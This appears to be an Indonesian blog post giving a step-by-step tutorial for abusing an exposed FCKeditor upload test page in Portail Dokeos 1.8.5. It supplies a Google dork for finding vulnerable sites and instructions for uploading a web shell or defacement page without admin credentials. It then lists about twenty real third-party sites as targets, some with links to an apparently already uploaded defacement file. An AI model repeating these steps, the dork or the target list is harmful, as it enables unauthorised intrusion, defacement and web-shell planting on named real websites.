Portail Dokeos adalah semacam FCK editor remote file upload di vulnerability ini hacker bisa mengupload shell ataupun halaman deface , teman-teman dapat mengupload dan melihat halaman deface atau file yang akan di upload pada website tanpa username dan password admin . Oke Langsung aja ke tutorialnya ..
Google Dork :
Exploit :
Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
Google Dork :
"Portail Dokeos 1.8.5"
Exploit :
http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
- pergi ke : http://taget teman/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- Ganti ASP ke PHP kemudian > klik browse > kemudian pilih file yang ingin teman upload > kemudian klik upload. Teman-Teman Bisa mengupload File Yang Berkstensi : PHP,HTML,JPG, Dan TXT
- Untuk melihat Hasil File yang sudah di upload pergi ke : http://website/patch/main/upload/file sobat
Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.htmlSitus Lain Yang Memiliki Vulnerability :
Hasil : http://www.blowupwebshow.com/staff/main/upload/r14nul.html
Live Demo : http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Hasil : http://www.rottapro.net/main/upload/r14nul.html
Live Demo : http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html Hasil : http://www.dokeos.nrc-gauthey.fr/main/upload/r14nul.html
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Sekian Dulu ya, Kawan :D ( ma'af Tutorialnya Jelek ) , semoga bermanfaat :D
Tidak ada komentar:
Posting Komentar